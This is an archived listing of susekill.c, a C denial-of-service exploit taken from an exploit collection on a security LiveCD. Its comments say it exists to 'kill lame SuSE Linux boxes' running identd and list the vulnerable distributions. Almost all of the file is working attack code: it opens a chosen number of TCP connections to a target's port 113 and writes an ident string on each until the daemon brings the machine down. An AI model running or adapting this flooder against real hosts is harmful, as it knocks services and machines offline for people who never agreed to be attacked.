home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / linux / local / susekill.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  106 lines

  1. /* susekill.c by friedolin
  2.  * 
  3.  * used to kill lame SuSE Linux boxes with identd running
  4.  * identd must be started with -w -t120 to crash a machine
  5.  *
  6.  * have fun, friedolin <hendrik@scholz.net>
  7.  *
  8.  * based on gewse.c by napster
  9.  */
  10.  
  11. /* Tested systems:
  12.  *
  13.  * vulnerable:
  14.  *
  15.  *  SuSE-Linux 4.4 - 6.2
  16.  *  Slackware  3.2 and 3.6
  17.  *
  18.  * not vulnerable:
  19.  *
  20.  *  RedHat 5.0 - 6.0 
  21.  *  Debian 2.0 - 2.1
  22.  * 
  23.  * not tested:
  24.  *
  25.  *  pre 4.3 SuSE systems
  26.  *  pre 5.0 RedHat
  27.  *  pre 2.0 Debian
  28.  *  other Slackware releases
  29.  *  Caldera Open Linux, ...
  30.  *
  31.  * please send me your results and experiences !
  32.  * 
  33. */
  34.  
  35. #include <sys/types.h>
  36. #include <sys/socket.h>
  37. #include <stdio.h>
  38. #include <unistd.h>
  39. #include <stdlib.h>
  40. #include <string.h>
  41. #include <netinet/in.h>
  42. #include <netdb.h>
  43.  
  44. #define GETIDENT "1027, 6667 : USERID : UNIX : killsuse"
  45.  
  46. int sockdesc;
  47. int portkill;
  48. int numkill;
  49. int x;
  50.  
  51. void usage(char *progname)
  52. {
  53.   printf("susekill by friedolin (based on gewse.c)\n");
  54.   printf("usage: %s <host> <# of connections>\n",progname);
  55.   exit(69);
  56. }
  57.  
  58. main(int argc, char *argv[])
  59. {
  60.     
  61.  struct sockaddr_in sin;
  62.  struct hostent *he;
  63.  
  64.  if (argc<3) usage(argv[0]);
  65.   
  66.  sin.sin_port = htons(113);
  67.  sin.sin_family = AF_INET;
  68.  
  69.  he = gethostbyname(argv[1]);
  70.  if (he) {
  71.    sin.sin_family = AF_INET;
  72.    sin.sin_port = htons(113);
  73.    memcpy((caddr_t)&sin.sin_addr.s_addr, he->h_addr, he->h_length);
  74.  } else {
  75.    perror("resolving");
  76.  }
  77.  
  78.  numkill  = atoi(argv[2]);
  79.  
  80.  printf("Flooding %s [%s] identd %d times.\n", argv[1], inet_ntoa(sin.sin_addr.s_addr), numkill);
  81.  printf("Killing");
  82.  fflush(stdout);
  83.  
  84.  for (x=1;x<=numkill;x++) {
  85.  
  86.  sockdesc = socket(AF_INET, SOCK_STREAM, 0);
  87.  
  88.  if (sockdesc < 0) {
  89.   perror("socket");
  90.   exit(69);
  91.  }
  92.   
  93.   if (connect(sockdesc, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
  94.    perror("connect");
  95.    exit(69);
  96.   }
  97.  
  98.   printf(" .");
  99.   fflush(stdout);
  100.   (void) write(sockdesc, GETIDENT, strlen(GETIDENT));
  101.  }
  102.  
  103.  printf("\n");
  104.  
  105. }
  106.